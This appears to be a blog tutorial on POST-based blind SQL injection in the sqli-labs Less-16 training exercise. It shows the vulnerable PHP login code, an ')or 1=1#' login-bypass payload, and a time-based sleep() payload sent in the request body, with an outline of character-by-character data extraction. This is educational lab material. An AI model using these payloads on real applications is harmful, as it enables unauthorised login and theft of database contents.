My intensive study of SQL injection has been put off for a long time; this time I can finally get down to it properly.
This time the subject is POST blind injection. POST blind injection is generally done with the help of Burp Suite (or any tool that lets you edit the request body), because the injection point sits in the POST body rather than in the URL.
POST /sql/Less-16/?id=1 HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-16/?id=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
uname=1&passwd=1&submit=Submit
This is a captured POST request. Now let's look at the source of the Less-16 page:
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);

// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    $uname=$_POST['uname'];
    $passwd=$_POST['passwd'];
    $uname='"'.$uname.'"';
    $passwd='"'.$passwd.'"';
    @$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        //echo '<font color= "#0000ff">';
        echo "<br>";
        echo '<font color= "#FFFF00" font size = 4>';
        //echo " You Have successfully logged in " ;
        echo '<font size="3" color="#0000ff">';
        echo "<br>";
        //echo 'Your Login name:'. $row['username'];
        echo "<br>";
        //echo 'Your Password:' .$row['password'];
        echo "<br>";
        echo "</font>";
        echo "<br>";
        echo "<br>";
        echo '<img src="../images/flag.jpg" />';
        echo "</font>";
    }
    else
    {
        echo '<font color= "#0000ff" font size="3">';
        echo "</br>";
        echo "</br>";
        //echo "Try again looser";
        //print_r(mysql_error());
        echo "</br>";
        echo "</br>";
        echo "</br>";
        echo '<img src="../images/slap.jpg" />';
        echo "</font>";
    }
}
?>
Note the two wrapping assignments and the $sql line (highlighted in red in the original). The user input goes through only two transformations: first it is wrapped in double quotes, then in parentheses, so the query ends up as username=("...") and password=("..."). The @ in front of the $sql assignment only suppresses PHP warnings for that one expression; what actually keeps database errors off the page is error_reporting(0) at the top together with the commented-out print_r(mysql_error()). Either way, nothing from the database is echoed. Look at the output: there are only two possible responses, both images, flag.jpg when the query returns a row and slap.jpg when it does not, and without valid credentials you always get slap.jpg. So error-based and UNION-based extraction are out, and we are left with blind injection.
That basically settles the approach:
time-based blind injection (the flag/slap image pair is itself a true/false oracle, so boolean-based blind injection would also work here; this post uses the time-based variant)
Actually, the simplest thing here is a universal-password payload:
")or 1=1#
which logs you straight in: the ") closes the ("...") wrapper, or 1=1 makes the WHERE clause true for every row, and # comments out the rest of the query, including the password check. But the point of practising POST injection is to extract information, so what do we do?
Modify the request to look like this:
POST /sql/Less-16/?id=1 HTTP/1.1
Host: 192.168.150.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.150.129/sql/Less-16/?id=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
uname=admin")or if(user()='root@localhost',sleep(2),null)#&passwd=1&submit=Submit
If the current database user is root@localhost, the response comes back delayed; otherwise it returns immediately. Two practical points. First, URL-encoding the payload in Burp (Ctrl+U) is the safe habit: PHP decodes the body before the query is built, and a raw & or + inside a payload would otherwise be eaten by the form parser (this payload contains neither, which is why it works as sent). Second, sleep() runs on every row for which MySQL evaluates the if(); with or, that is every row whose username is not admin that MySQL examines, so the total delay can be several times 2 seconds rather than exactly 2. It is still an unmistakable signal, but admin") and if(...)# limits evaluation to the single admin row and keeps the delay at 2 seconds per request. From here, using the approach from the earlier post on time-based injection, we replace the user() check with ascii()/substring() comparisons and pull the information out one character at a time.